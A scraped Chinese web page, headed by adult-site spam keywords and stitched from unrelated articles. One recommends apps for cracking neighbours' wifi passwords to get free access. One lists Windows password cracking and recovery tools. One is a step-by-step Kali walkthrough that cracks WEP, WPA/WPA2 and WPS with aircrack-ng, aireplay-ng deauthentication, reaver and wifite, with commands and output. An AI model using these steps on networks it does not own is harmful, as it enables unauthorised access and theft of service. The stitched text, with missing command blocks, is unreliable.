欧美vvv,亚洲第一成人在线,亚洲成人欧美日韩在线观看,日本猛少妇猛色XXXXX猛叫

新聞資訊

    有流量怎么辦,蹭wifi,用什么軟件蹭呢?下面分享4款wifi密碼破解軟件,讓你成功連接wifi享受免費wifi的樂趣。

    wifi萬能鑰匙這個軟件是應該是大家必備的軟件吧,反正我手機是必備的,蹭網很簡單,點擊查詢萬能鑰匙就可以看到附近可以連接的wifi,然后選擇你要連接的wifi就可以開始連接了,成功率還是挺高的。

    騰訊wifi管家是我的第二選擇了,當wifi萬能鑰匙連不上的時候我會打開它看看它能不能連上,兩個互相使用還是非常方便的,騰訊的用戶群體很大也分享了非常多的免費wifi。

    幻影wifi是一款跑字典的軟件,就是窮舉,用文件里的一個個密碼去嘗試連接,這個最笨的方法,有的wifi密碼簡單的可以很快就破解出來,比如987654321 類似的密碼,它是我第三首選,在上面兩個軟件都沒有密碼的情況下我會用它來碰碰運氣,一般密碼簡單的幾分鐘就破解出來了。

    沒錯,這就是軟件自帶的密碼字典,你也可以制作自己的字典去跑,一般也沒什么意義。

    點擊開始破解就會掃描附近的wif。

    選擇一個信號不錯的wifi進行破解跑字典。

    破解出來以后會顯示密碼并自動連接。

    一般我用這個破解就是開著軟件讓它跑,運氣好的馬上就出來了,如果1小時到半天跑不出來就沒意義了。密碼一定很復雜像是手機號類似的就放棄吧。

    最后一個幻影pin是跑路由器pin碼的軟件,它有一個局限性就是只能破解打開pin的路由器,而且如果路由器有防止pin的話也無法破解,多一個工具總是好的,我的手機上不知道怎么回事安裝不了驅動,所以就沒法演示了,這個軟件也是暴力破解的,不知道pin碼的可以去百度搜一下,但是現在很多路由器都沒有pin的功能了,所以這個軟件以后的作用會越來越少。

    今天的4款wifi破解工具非常齊全,總有一個能幫你連上wifi,其他雜七雜八的小破解工具我也沒去試,有的都是廣告,這里希望大家不要盲目去下載。歡迎搜索關注并加入老王研究所交流,我會盡可能回答大家的問題。本期視頻和資源已上傳到網站,歡迎點擊閱讀原文查看。



    開電腦準備登錄win10時,最糟糕的事情發生了:密碼丟失。

    由于Windows10的安全性進一步增強,使得登錄密碼比以往任何時候都更加重要,如果不輸入密碼(或使用一些技巧),基本上無法登錄到Windows10計算機。

    如果用戶丟失了Windows登錄密碼,除了重新安裝系統外,似乎沒有其他解決方案。

    在本文中,將介紹幾個密碼破解軟件和Windows10密碼恢復軟件,這些專用工具可以幫助大家快速找回丟失的Windows密碼。


    提醒:使用密碼破解軟件,一定是出于恢復個人丟失的密碼目的,千萬不要使用它來闖入他人的計算機,這可能會給你帶來麻煩。

    1、Ophcrack



    根據用戶的反饋,Ophcrack無疑是可以找到的最佳Windows密碼恢復工具。它是完全免費的,即使是初次使用的用戶,它也非常有效,快速且簡單。

    這個工具功能非常強大,它甚至不要求你登錄到Windows系統就能夠恢復密碼。

    只需下載ISO映像,將其裝載到可引導的U盤上,它將自動恢復你的密碼。

    啟動電腦時,Ophcrack程序啟動,然后會查找Windows(Microsoft)帳戶并立即開始恢復過程。

    根據測試,Ophcrac能夠在幾分鐘內恢復你的密碼。它變得更好,因為Ophcrack是完全免費的!

    2、Offline NT Password & Registry Editor


    實際上,這個工具無法恢復你的密碼,但是它會刪除原來的密碼,然后可以重新設置一個新的密碼(這次記住它)。

    它的工作方式與Ophcrack相似:下載一個ISO文件,將其掛載到可啟動U盤上,將其插入計算機,然后可以開始操作過程。

    它比Ophcrack還要快,通常它會立即重置密碼。但是,對于一般用戶而言,Offline NT Password & Registry Editor并不是那么容易使用,因為它需要使用命令行。

    3、LCP


    LCP是另一個免費的用戶帳戶密碼恢復工具,與其它工具不同的是,這個工具要求你可以訪問計算機上的用戶帳戶。

    這個軟件采用三種方法破解密碼:字典攻擊、暴力攻擊,或混合字典/暴力攻擊。每種方法都有其自身的優點,但是需要具有一些基本的知識才能執行這些操作。

    在恢復密碼時,LCP會使用大量的計算機資源,因此建議在恢復過程中不要將計算機用于其他用途。

    4、Hash Suite


    哈希套件是是一個先進的密碼破解工具,功能非常強大,被認為是市場上最快的密碼破解器之一。這個程序的目的是為了測試安全的密碼哈希值,當然,還要破解它們。

    它提供了深入的分析、報告和統計信息,基本上,你需要管理密碼和哈希的所有操作。

    該工具界面設計簡單,易于使用,但是,這個工具是不適合初學者,因為它需要采用PWDUMP工具來獲得哈希套件需要破解的哈希值。因此,如果你不熟悉這些術語,最好選擇使用其它的工具。

    5、John the Ripper


    這是一個免費的程序,它需要特殊的單詞列表來發現密碼,當然,這些密碼可以以一定的價格獲得。

    你可能會找到一些與John the Ripper兼容的免費單詞列表,但我們不確定它們的性能如何。

    該工具面向高級用戶,因為它還使用命令行環境,普通用戶可能會很難理解。

    6、Windows Key


    Windows Key創建一個啟動盤,可以在啟動電腦時使用它來恢復密碼。

    該程序使用非常簡單,甚至可以恢復本地(標準版)和域管理員帳戶(僅企業版)密碼。

    此工具可為TrueCrypt、Android、Zip和許多其他類型的文件提供快速的密碼恢復,解密蘋果文件系統(APFS)磁盤和macOS High Sierra鑰匙串。

    用戶可以使用該程序的免費試用版來創建可啟動盤,但是在支付完整版費用之前,將無法恢復任何密碼。

    這個工具的優點之處在于,你無需成為IT專家,任何人都可以使用它。

    7、Windows Password Unlocker


    該工具使用可啟動盤來恢復啟動時的密碼。不論什么原因,如果電子郵件密碼丟失或不可用,都可以使用使用Password Unlocker Bundle快速輕松地恢復它。它有三種版本:標準版、專業版和企業版。

    該軟件的不足之處在于,只有專業版和企業版才能真正檢索任何密碼,標準版僅用于創建可啟動盤。

    8、Active Password Changer Professional


    如果你想要一個簡單但功能強大的工具立即刪除忘記的密碼,Active Password Changer Professional也許是最佳的選擇。

    這個工具非常容易設置和使用,對于新手用戶來說是個好消息。如果你使用的Windows7,可以使用本文中的工具恢復你的密碼。不幸的是,用戶需要付費才能使用它。

    9、Windows Password Reset Standard


    該工具將刪除密碼而不是恢復密碼,其工作方式與上面介紹的工具類似。

    Windows Password Reset Standard比其他工具要簡單得多,但是它的選項也較少。

    要開始使用該工具,只需下載一個ISO文件,掛載它,然后開始重置密碼即可。

    由于此工具的功能少于Active Password Changer Professional,因此它的價格也較低。

    總結

    以上就是我們給大家推薦的幾款Windows 10最佳密碼恢復工具。所有這些程序在功能、可用性、恢復方法、價格等方面都不同,你根據自己的需要選擇合適的工具來使用。

    為了避免需要恢復Windows10密碼的情況,建議你使用良好的密碼管理器,它不僅可以幫助你管理密碼,而且還可以讓你知道哪個密碼是弱的。

    擴展閱讀:

    ■>>如何重置忘記的Windows10密碼,掌握這3個技巧就行了

    ■>>太厲害了,只需一條DOS命令,就可以找到windows10許可證密鑰

    ■>>解密windows系統版本和版本號,深入了解一組簡單數字背后的故事

    更多windows 10操作系統使用技巧,請關注→→#win10玩機技巧#

    想了解更多精彩內容,請關注@微課傳媒



    頭條號【微課傳媒】專注軟件分享,如果你喜歡玩軟件,歡迎關注、評論、收藏、轉發。

    ircrack-ng是一款基于破解無線802.11協議的WEP及WPA-PSK加密的工具。該工具主要用了兩種攻擊方式進行WEP破解。一種是FMS攻擊,該攻擊方式是以發現該WEP漏洞的研究人員名字(Scott Fluhrer、Itsik Mantin及Adi Shamir)所命名;另一種是Korek攻擊,該攻擊方式是通過統計進行攻擊的,并且該攻擊的效率要遠高于FMS攻擊。本節將介紹使用Aircrack-ng破解無線網絡。

    9.2.1 破解WEP加密的無線網絡

    Wired Equivalent Privacy或WEP(有線等效加密)協議是對在兩臺設備間無線傳輸的數據進行加密的方式,用以防止非法用戶竊聽或侵入無線網絡。不過密碼分析學家已經找出WEP好幾個弱點,因此在2003年被Wi-Fi Protected Access(WPA)淘汰,又在2004年由完整的IEEE 802.11i標準(又稱為WPA2)所取代。本小節將介紹破解WEP加密的無線網絡。

    使用Aircrack破解使用WEP加密的無線網絡。具體操作步驟如下所示。

    (1)使用airmon-ng命令查看當前系統中的無線網絡接口。執行命令如下所示:

    輸出的信息表示,當前系統中存在一個無線網絡接口。從輸出結果的Interface列,可以看到當前系統的無線接口為wlan0。

    (2)修改wlan0接口的MAC地址。因為MAC地址標識主機所在的網絡,修改主機的MAC地址可以隱藏真實的MAC地址。在修改MAC地址之前,需要停止該接口。執行命令如下所示:

    或者:

    root@kali:~# ifconfig wlan0 down
    

    執行以上命令后,wlan0接口則停止。此時就可以修改MAC地址了,執行命令如下 所示:

    root@kali:~# macchanger --mac 00:11:22:33:44:55 wlan0
    Permanent MAC: 00:c1:40:76:05:6c (unknown)
    Current   MAC: 00:c1:40:76:05:6c (unknown)
    New       MAC: 00:11:22:33:44:55 (Cimsys Inc)
    

    輸出的信息顯示了wlan0接口永久的MAC地址、當前的MAC地址及新的MAC地址。可以看到wlan1接口的MAC地址已經被修改。

    (3)重新啟動wlan0。執行命令如下所示:

    輸出的信息顯示了無線網卡wlan0的芯片及驅動類型。例如,當前系統的無線網卡芯片為Ralink RT2870/3070;默認驅動為rt2800usb,并顯示監聽模式被啟用,映射網絡接口為mon0。

    有時候使用airmon-ng start wlan0命令啟用無線網卡時,可能會出現SIOCSIFFLAGS: Operation not possible due to RF-kill錯誤。這是因為Linux下有一個軟件RF-kill,該軟件為了省電會將不使用的無線設備(如WIFI和Buletooth)自動關閉。當用戶使用這些設備時,RF-kill不會智能的自動打開,需要手動解鎖。用戶可以執行rfkill list命令查看所有設備,如下所示:

    root@kali:~# rfkill list
    0: ideapad_wlan: Wireless LAN
    Soft blocked: yes
    Hard blocked: no
    1: phy0: Wireless LAN
    Soft blocked: yes
    Hard blocked: no
    

    該列表中前面的編號,表示的是設備的索引號。用戶可以通過指定索引號,停止或啟用某個設備。如啟用所有設備,執行如下所示的命令:

    root@kali:~# rfkill unblock all
    

    執行以上命令后,沒有任何信息輸出。以上命令表示,解除所有被關閉的設備。

    (4)使用airodump命令定位附近所有可用的無線網絡。執行命令如下所示:

    以上輸出的信息顯示了附近所有可用的無線網絡。當找到用戶想要攻擊的無線路由器時,按下Ctrl+C鍵停止搜索。

    從輸出的信息中看到有很多參數。詳細介紹如下所示。

    • BSSID:無線的IP地址。
    • PWR:網卡報告的信號水平。
    • Beacons:無線發出的通告編號。
    • Data:被捕獲到的數據分組的數量,包括廣播分組。
    • /s:過去10秒鐘內每秒捕獲數據分組的數量。
    • CH:信道號(從Beacons中獲取)。
    • MB:無線所支持的最大速率。如果MB=11,它是802.11b;如果MB=22,它是802.11b+;如果更高就是802.11g。后面的點(高于54之后)表明支持短前導碼。
    • ENC:使用的加密算法體系。OPN表示無加密。WEP?表示WEP或者WPA/WPA2模式,WEP(沒有問號)表示靜態或動態WEP。如果出現TKIP或CCMP,那么就是WPA/WPA2。
    • CIPHER:檢測到的加密算法,是CCMP、WRAAP、TKIP、WEP和WEP104中的一個。典型的來說(不一定),TKIP與WPA結合使用,CCMP與WPA2結合使用。如果密鑰索引值大于0,顯示為WEP40。標準情況下,索引0-3是40bit,104bit應該是0。
    • AUTH:使用的認證協議。常用的有MGT(WPA/WPA2使用獨立的認證服務器,平時我們常說的802.1x、radius和eap等)、SKA(WEP的共享密鑰)、PSK(WPA/WPA2的預共享密鑰)或者OPN(WEP開放式)。
    • ESSID:指所謂的SSID號。如果啟用隱藏的SSID的話,它可以為空。這種情況下,airodump-ng試圖從proberesponses和associationrequests中獲取SSID。
    • STATION:客戶端的MAC地址,包括連上的和想要搜索無線來連接的客戶端。如果客戶端沒有連接上,就在BSSID下顯示“notassociated”。
    • Rate:表示傳輸率。
    • Lost:在過去10秒鐘內丟失的數據分組,基于序列號檢測。它意味著從客戶端來的數據丟包,每個非管理幀中都有一個序列號字段,把剛接收到的那個幀中的序列號和前一個幀中的序列號一減就能知道丟了幾個包。
    • Frames:客戶端發送的數據分組數量。
    • Probe:被客戶端查探的ESSID。如果客戶端正試圖連接一個無線,但是沒有連接上,那么就顯示在這里。

    (5)使用airodump-ng捕獲指定BSSID的文件。執行命令如下所示。

    airodump-ng命令常用的選項如下所示。

    • -c:指定選擇的頻道。
    • -w:指定一個文件名,用于保存捕獲的數據。
    • -bssid:指定攻擊的BSSID。

    下面將Bssid為14:E6:E4:AC:FB:20的無線路由器作為攻擊目標。執行命令如下所示:

    從輸出的信息中可以看到ESSID為Test無線路由器的#Data一直在變化,表示有客戶端正與無線發生數據交換。以上命令執行成功后,會生成一個名為wirelessattack-01.ivs的文件,而不是wirelessattack.ivs。這是因為airodump-ng工具為了方便后面破解的時候調用,所有對保存文件按順序編了號,于是就多了-01這樣的序號,以此類推。在進行第二次攻擊時,若使用同樣文件名wirelessattack保存的話,就會生成名為wirelessattack-02.ivs文件。

    (6)打開一個新的終端窗口,運行aireplay命令。aireplay命令的語法格式如下所示:

    aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface]
    aireplay-ng -dauth 1 -a [BSSID] -c [our Chosen MAC address] [Interface]
    

    啟動aireplay,執行命令如下所示:

    root@kali:~# aireplay-ng -1 0 -a 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 -e Test mon0
    The interface MAC (00:C1:40:76:05:6C) doesn't match the specified MAC (-h).
      ifconfig mon0 hw ether 00:11:22:33:44:55
    17:25:17 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1
    17:25:17 Sending Authentication Request (Open System) [ACK]
    17:25:17 Switching to shared key authentication
    17:25:19 Sending Authentication Request (Shared Key) [ACK]
    17:25:19 Switching to shared key authentication
    17:25:21 Sending Authentication Request (Shared Key) [ACK]
    17:25:21 Switching to shared key authentication
    17:25:23 Sending Authentication Request (Shared Key) [ACK]
    17:25:23 Switching to shared key authentication
    17:25:25 Sending Authentication Request (Shared Key) [ACK]
    17:25:25 Switching to shared key authentication
    17:25:27 Sending Authentication Request (Shared Key) [ACK]
    17:25:27 Switching to shared key authentication
    17:25:29 Sending Authentication Request (Shared Key) [ACK]
    17:25:29 Switching to shared key authentication
    

    (7)使用aireplay發送一些流量給無線路由器,以至于能夠捕獲到數據。語法格式如下所示:

    aireplay-ng 3 -b [BSSID] -h [Our chosen MAC address] [Interface]
    

    執行命令如下所示:

    root@kali:~# aireplay-ng -3 -b 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 mon0
    The interface MAC (00:C1:40:76:05:6C) doesn't match the specified MAC (-h).
      ifconfig mon0 hw ether 00:11:22:33:44:55
    17:26:54 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1
    Saving ARP requests in replay_arp-0515-172654.cap
    You should also start airodump-ng to capture replies.
    Notice: got a deauth/disassoc packet. Is the source MAC associated ?
    Read 1259 packets (got 1 ARP requests and 189 ACKs), sent 198 packets…(499 pps
    Read 1547 packets (got 1 ARP requests and 235 ACKs), sent 248 packets…(499 pps
    Read 1843 packets (got 1 ARP requests and 285 ACKs), sent 298 packets…(499 pps
    Read 2150 packets (got 1 ARP requests and 333 ACKs), sent 348 packets…(499 pps
    Read 2446 packets (got 1 ARP requests and 381 ACKs), sent 398 packets…(499 pps
    Read 2753 packets (got 1 ARP requests and 430 ACKs), sent 449 packets…(500 pps
    Read 3058 packets (got 1 ARP requests and 476 ACKs), sent 499 packets…(500 pps
    Read 3367 packets (got 1 ARP requests and 525 ACKs), sent 548 packets…(499 pps
    Read 3687 packets (got 1 ARP requests and 576 ACKs), sent 598 packets…(499 pps
    Read 4001 packets (got 1 ARP requests and 626 ACKs), sent 649 packets…(500 pps
    Read 4312 packets (got 1 ARP requests and 674 ACKs), sent 699 packets…(500 pps
    Read 4622 packets (got 1 ARP requests and 719 ACKs), sent 749 packets…(500 pps
    Read 4929 packets (got 1 ARP requests and 768 ACKs), sent 798 packets…(499 pps
    Read 5239 packets (got 1 ARP requests and 817 ACKs), sent 848 packets…(499 pps
    

    輸出的信息就是使用ARP Requests的方式來讀取ARP請求報文的過程,此時回到airodump-ng界面查看,可以看到Test的Frames欄的數字在飛速的遞增。在抓取的無線數據報文達到了一定數量后,一般都是指IVsX值達到2萬以上時,就可以開始破解,若不能成功就等待數據包文繼續抓取,然后多嘗試幾次。

    (8)使用Aircrack破解密碼。執行命令如下所示:

    從輸出的結果中可以看到KEY FOUND,表示密碼已經找到,為abcde。

    9.2.2 破解WPA/WPA2無線網絡

    WPA全名為Wi-Fi Protected Access,有WPA和WPA2兩個標準。它是一種保護無線電腦網絡安全的協議。對于啟用WPA/WPA2加密的無線網絡,其攻擊和破解步驟及攻擊是完全一樣的。不同的是,在使用airodump-ng進行無線探測的界面上,會提示為WPA CCMP PSK。當使用aireplay-ng進行攻擊后,同樣獲取到WPA握手數據包及提示;在破解時需要提供一個密碼字典。下面將介紹破解WPA/WPA2無線網絡的方法。

    使用aircrack-ng破解WPA/WPA2無線網絡的具體操作步驟如下所示。

    (1)查看無線網絡接口。執行命令如下所示:

    (2)停止無線網絡接口。執行命令如下所示:

    (3)修改無線網卡MAC地址。執行命令如下所示:

    root@kali:~# macchanger --mac 00:11:22:33:44:55 wlan0
    Permanent MAC: 00:c1:40:76:05:6c (unknown)
    Current   MAC: 00:c1:40:76:05:6c (unknown)
    New       MAC: 00:11:22:33:44:55 (Cimsys Inc)
    

    (4)啟用無線網絡接口。執行命令如下所示:

    (5)捕獲數據包。執行命令如下所示:

    (6)對無線路由器Test進行Deauth攻擊。執行命令如下所示:

    root@kali:~# aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33: 44:55 mon0
    17:50:27 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1
    17:50:30 Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [12|59 ACKs]
    

    (7)破解密碼。執行命令如下所示:

    從輸出的信息中可以看到無線路由器的密碼已經成功破解。在KEY FOUND提示的右側可以看到密碼已被破解出,為daxueba,破解速度約為500.88 k/s。

    9.2.3 攻擊WPS(Wi-Fi Proteced Setup)

    WPS是由Wi-Fi聯盟所推出的全新Wi-Fi安全防護設定標準。該標準主要是為了解決無線網絡加密認證設定的步驟過于繁雜的弊病。因為通常用戶往往會因為設置步驟太麻煩,以至于不做任何加密安全設定,從而引起許多安全上的問題。所以很多人使用WPS設置無線設備,可以通過個人識別碼(PIN)或按鈕(PBC)取代輸入一個很長的密碼短語。當開啟該功能后,攻擊者就可以使用暴力攻擊的方法來攻擊WPS。本小節將介紹使用各種工具攻擊WPS。

    現在大部分路由器上都支持WPS功能。以前路由器有專門的WPS設置,現在的路由器使用QSS功能取代了。這里以TP-LINK型號為例,介紹設置WPS功能,如圖9.15所示。如果使用WPS的PBC方式,只需要按下路由器上的QSS/RESET按鈕就可以了。

    圖9.15 設置WPS

    從該界面可以看到QSS功能已開啟,可以看到當前的PIN碼是04588306。這里可以重新生成新的PIN碼,或者恢復初始PIN碼。

    【實例9-1】使用Reaver破解WPS。具體操作步驟如下所示。

    (1)插入無線網卡,使用ifconfig命令查看無線網卡是否已經正確插入。執行命令如下所示:

    root@Kali:~# ifconfig
    eth0  Link encap:Ethernet HWaddr 00:19:21:3f:c3:e5
          inet addr:192.168.5.4 Bcast:192.168.5.255 Mask:255.255.255.0
          inet6 addr: fe80::219:21ff:fe3f:c3e5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:10541 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7160 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4205470 (4.0 MiB) TX bytes:600691 (586.6 KiB)
    lo    Link encap:Local Loopback
          inet addr:127.0.0.1 Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING MTU:65536 Metric:1
          RX packets:296 errors:0 dropped:0 overruns:0 frame:0
          TX packets:296 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:17760 (17.3 KiB) TX bytes:17760 (17.3 KiB)
    

    從輸出的信息中可以看到,只有一個以太網接口eth0。這是因為無線網卡可能沒有啟動,首先來啟動該無線網卡。執行命令如下所示:

    root@Kali:~# ifconfig wlan0 up
    

    執行以上命令后,沒有任何信息輸出。此時再次執行ifconfig命令,查看無線網絡是否已啟動,如下所示:

    root@Kali:~# ifconfig
    ......
    wlan0  Link encap:Ethernet HWaddr 08:10:76:49:c3:cd
           UP BROADCAST MULTICAST MTU:1500 Metric:1
           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000
           RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
    

    看到以上輸出信息,則表示無線網卡已成功啟動,其網絡接口為wlan0。

    (2)啟動無線網卡為監聽模式。執行命令如下所示:

    從輸出的信息中,可以看到monitor mode enabled on mon0,表示無線網卡已啟動監聽模式。在以上信息中,還可以看到無線網卡的芯片級驅動類型。其中,該網卡的芯片為Ralink,默認驅動為rt2800usb。

    注意:執行以上命令啟動監聽模式,一定要確定正確識別無線網卡的芯片和驅動。否則,該無線網卡可能導致攻擊失敗。

    (3)攻擊WPS。執行命令如下所示:

    root@kali:~# reaver -i mon0 -b 14:E6:E4:AC:FB:20 -vv
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@ tacnetsol.com>
    [+] Waiting for beacon from 14:E6:E4:AC:FB:20
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 11
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 7
    [+] Associated with 8C:21:0A:44:09:F8 (ESSID: yztxty)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    ......
    

    從以上輸出信息中,可以看到正在等待連接到14:E6:E4:AC:FB:20無線路由器的信號。并且通過發送PIN信息,獲取密碼。

    如果沒有路由器沒有開啟WPS的話,將會出現如下所示的信息:

    [!] WARNING: Failed to associate with 14:E6:E4:AC:FB:20 (ESSID: XXXX)
    

    Fern WiFi Cracker是一個非常不錯的工具,用來測試無線網絡安全。后面將會介紹使用該工具,攻擊Wi-Fi網絡。這里首先介紹使用Fern WiFi Cracker工具來攻擊WPS。

    【實例9-2】使用Wifite攻擊WPS。具體操作步驟如下所示。

    (1)啟動Wifite工具,并指定使用common.txt密碼字典。在命令行終端執行如下所示的命令:

    root@kali:~# wifite -dict common.txt
    

    執行以上命令后,將顯示如下所示的信息:

    以上信息顯示了WiFite工具的版本信息,支持平臺,并且開始掃描無線網絡。當掃描到想要破解的無線網絡時,按下CTRL+C組合鍵停止掃描。

    (2)停止掃描無線網絡,將顯示如下所示的信息:

    從以上輸出信息中,可以看到掃描到五個無線接入點和三個客戶端。在輸出信息中,共顯示了7列。分別表示無線接入點編號、ESSID號、信道、加密方式、電功率、是否開啟wps和客戶端。如果僅有一個客戶端連接到無線接入點,則CLIENT列顯示是client。如果有多個客戶端連接的話,則顯示是clients。

    (3)此時,選擇要攻擊的無線接入點。這里選擇第五個無線接入點,輸入“1”。然后按下回車鍵將開始攻擊,顯示信息如下所示:

    [+] select target numbers (1-5) separated by commas, or 'all': 1
    [+] 1 target selected.
    [0:00:00] initializing WPS PIN attack on yzty (EC:17:2F:46:70:BA)
     [0:11:00] WPS attack, 0/0 success/ttl,
     [!] unable to complete successful try in 660 seconds
     [+] skipping yzty
     [0:08:20] starting wpa handshake capture on "yzty"
     [0:08:11] new client found: 18:DC:56:F0:62:AF
     [0:08:09] listening for handshake…
     [0:00:11] handshake captured! saved as "hs/yzty_EC-17-2F-46-70-BA.cap"
     [+] 2 attacks completed:
     [+] 1/2 WPA attacks succeeded
             yzty (EC:17:2F:46:70:BA) handshake captured
             saved as hs/yzty_EC-17-2F-46-70-BA.cap
     [+] starting WPA cracker on 1 handshake
     [0:00:00] cracking yzty with aircrack-ng
     [+] cracked yzty (EC:17:2F:46:70:BA)!
     [+] key:  "huolong5"
    [+] quitting
    

    從輸出的信息中,可以看到破解出yzty無線設備的密碼為huolong5。

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有